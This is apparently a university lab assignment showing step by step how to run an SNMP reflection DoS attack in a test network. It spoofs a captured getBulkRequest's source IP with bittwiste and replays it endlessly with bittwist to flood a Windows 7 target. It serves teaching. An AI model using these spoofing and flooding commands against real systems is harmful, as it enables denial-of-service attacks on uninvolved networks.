Proj 5x: Packet Amplification with SNMP (20 pts. extra credit)

What you need

A Windows Server 2008 machine, real or virtual, to act as the SNMP server
A Windows 7 machine, real or virtual, to act as the target
A Kali Linux machine, real or virtual, to act as the attacker
If you use virtual machines, make sure that all the virtual network adapters are set to the same mode (such as NAT) and that they can ping one another.
Turn off any firewalls. The machine most likely to have a firewall on is the Windows 7 machine.

Purpose

SNMP is a UDP-based protocol that is frequently set up in an unsafe manner, allowing attackers to use SNMP servers to amplify DoS attacks.

This project demonstrates the attack.

Disabling Routing and Remote Access

Routing and Remote Access snarls up network traffic if it's turned on for this project, so we'll shut it off.

On your Windows 2008 Server, click Start and type in SERVICES

In the results, click Services.

Scroll down to find "Routing and Remote Acess", as shown below. If it is there, click Stop to stop it. If it's not there, that's OK.

Enabling SNMP on the Windows 2008 Server

Follow these steps to enable SNMP:

http://blog.skufel.net/2012/09/how-to-adding-snmp-to-windows-server-2008-r2/

Configure your server with these outrageously insecure settings, as shown below:

Community String: public
Rights: READ ONLY
Accept SNMP packets from any host

Open a Command Prompt and execute the IPCONFIG command to find your Windows Server 2008 machine's IP address. Record it for future use.

Testing SNMP from Kali Linux

On your Kali Linux machine, in a Terminal window, execute this command, replacing the IP address with the IP address of your Windows server.

snmpbulkwalk -v 2c -c public 192.168.119.191

You should see many pages of output, as shown below.

If you don't see a response, check your networking to make sure the packets are reaching the target.

Vewing SNMP Request in Wireshark

On your Kali Linux machine, open another Terminal window and execute this command:

wireshark

Start Wireshark sniffing on your network adapter.

On your Kali Linux machine, in the other Terminal window, execute this command again, replacing the IP address with the IP address of your Windows server.

snmpbulkwalk -v 2c -c public 192.168.119.191

In Wireshark, at the upper left, in the Filter box, type this text and then press the Enter key:

udp.port==161

You see a long series of "SNMP getBulkRequest" packets, each followed by an "SNMP get-response", as shown below.

Measuring Packet Amplification

In Wireshark, in the top pane, select one of the SNMP packets.

In the middle frame, expand the "Frame" section.

Right-click "Frame Length" and click "Apply as Column", as shown below.

Now the upper pane of Wireshark shows a column named "Frame length on the wire".

Click the "Frame length on the wire" column header to sort by it.

Scroll to the bottom to find the largest value. Note its packet number (the "No." column on the left). In the figure below, the largest value was 793 bytes for packet No. 15.

In Wireshark, click the No. column header to sort the packets in time order again.

Scroll as needed to see the largest packet and the request packet preceding it.

In the image below, the request packet was No. 14 (87 bytes) and the response was No. 15 (793 bytes), so the amplification factor is 793/87 = 9.1.

Saving the SNMP Request Packet

Click the "SNMP getBulkRequest" packet that gave the largest response, so it is highlighted in the top pane of Wireshark, as shown below.

From the Wireshark menu bar, click File, "Export Specified Packets...".

In the "Wireshark: Export Specified Packets" box, at the top, enter a name of "SNMP-Req-YOURNAME.pcap".

On the "Save in folder:" line, click Desktop.

In the lower left, click the "Selected packet only button.

Select a "File type" of "Wireshark/tcpdump/... - libpcap", as shown below.

Click Save.

On your Kali Linux machine, close Wireshark.

Getting Bit-twist

Open a Web browser and go to

http://bittwist.sourceforge.net/

Download the Linux version and save it on your Kali desktop.

On your Kali Linux machine, in a Terminal window, execute these commands:

Note: when I installed libpcap-dev, I got an error processing "xplico" but it seems to be OK to just ignore that.

apt-get install libpcap-dev -y cd cd Desktop tar xzf bittwist-linux-2.0.tar.gz cd bittwist-linux-2.0 make make install

Find the Target IP Address

On your Windows 7 target machine, open a Command prompt and execute the IPCONFIG command to find its IP address.

Editing the SNMP Request Packet

Using bittwiste, we will change the source IP address of the SNMP Request packet to the target's IP address.

Bittwiste will calculate the correct checksum automatically.

On your Kali Linux machine, in a Terminal window, execute this command, replacing the IP address with your Windows 7 target machine's IP address:

cd cd Desktop bittwiste -I SNMP-Req-YOURNAME.pcap -O Attack-YOURNAME.pcap -T ip -s 192.168.119.229

When the command succeeds, you should see the message "1 packets (87 bytes) written", as shown below.

Testing the Attack

On your Windows 2008 Server, start Wireshark sniffing.

In the Filter box, enter

snmp

and press Enter.

On your Kali Linux machine, in a Terminal window, execute this command:

bittwist -i eth0 Attack-YOURNAME.pcap -l 3

You should see three SNMP requests coming in, and three SNMP responses going out to the Windows 7 target, as shown below.

If you have displayed the packet length, you'll see that the responses are much larger than the requests.

On your Windows Server 2008 machine, close Wireshark.

Saving a Screen Image

Make sure your screen shows these two items:

At least one SNMP getBulkRequest
At least one SNMP get-response

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 5xa". Use your real name, not the literal text "Your Name".

Configuring IKE on the Target Windows 7 Machine

This attack has no visible effect on the target, because the SNMP responses are hitting closed ports and the target needs very few resources to process them.

This attack is just a UDP flood at present, and if attackers use thousands of SNMP reflectors, that can overwhelm a network. But it makes a dull lab project.

To see the effect, we'll configure the Windows 7 machine to listen on port UDP 500, which is the IKE service used for L2TP/IPsec VPNs.

On your Windows 7 target machine, click Start, then "Control Panel", then "Network and Internet", then "Network and Sharing Center".

Click "Set up a new connection or network".

Select "Connect to a workplace" and click "Next".

Click "Use my Internet connection (VPN)".

For "Internet address:" enter 10.10.10.10

For "Destination name:" accept the default of "VPN Connection".

Check "Don't connect now; just set it up so I can connect later". Leave the other boxes unchecked, as shown below:

Click Next.

For "User name:" enter your Student

Leave "Password:", "Show characters", "Remember this password" and "Domain optional:" blank.

Click Create.

Now click Close. Do NOT click "Connect now".

Checking the Listening Port on the Windows 7 Target Machine

On your Windows 7 target machine, in a Command Prompt, execute this command:

netstat -an

You should see an entry showing an open port of

UDP 0.0.0.0:500

as shown below:

Monitoring the CPU on the Target

On your Windows 7 target machine, right-click the Taskbar (at the bottom of the desktop) and click "Start Task Manager".

Click the Performance tab. You should see 0% CPU usage, or close to it, as shown below:

Leave Task Manager running.

Editing the Attack to Target a Listening Port

Using bittwiste, we will change the source UDP Port of the SNMP Request packet to 500, so it will burden the target more.

On your Kali Linux machine, in a Terminal window, execute this command:

bittwiste -I Attack-YOURNAME.pcap -O Attack2-YOURNAME.pcap -T udp -s 500

When the command succeeds, you should see the message "1 packets (87 bytes) written", as shown below.

Attacking Port 500

On your Kali Linux machine, in a Terminal window, execute this command:

bittwist -i eth0 Attack2-YOURNAME.pcap -l 0

This sends an endless flood of SNMP requests to the Windows 2008 Server, which reflect and amplify, attacking the Windows 7 target.

You should see the CPU increase, as shown below. On one of my test machines, it rose to 50%, but on the one shown below, it only rose to 18%.

On your Kali Linux machine, press Ctrl+C to stop the attack.

Saving a Screen Image

Make sure your screen shows the CPU graph rising from near-zero to some larger sustained value.

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 5xb". Use your real name, not the literal text "Your Name".

Turning in your Project

Email the images as attachments to an e-mail message.

Send it to: cnit.124@gmail.com with a subject line of "Proj 5x From Your Name", replacing "Your Name" with your own first and last name.

Send a Cc to yourself.

Sources

Analysis of SNMP/NTP/CHARGEN DrDOS Attacks Prolexic, 2013

SNMP Reflected Denial of Service

NTP BASED DDOS ATTACK – UNDERSTANDING NTP REFLECTION (2014)

How-to : Adding SNMP to Windows Server 2008 R2

Duplicate network traffic from guest

Duplicate ping response when running Ubuntu as virtual machine (VMWare)

Windows 7 manual configuration for L2TP/IPSec VPN clients

Last Modified: 5-7-14 8:49 pm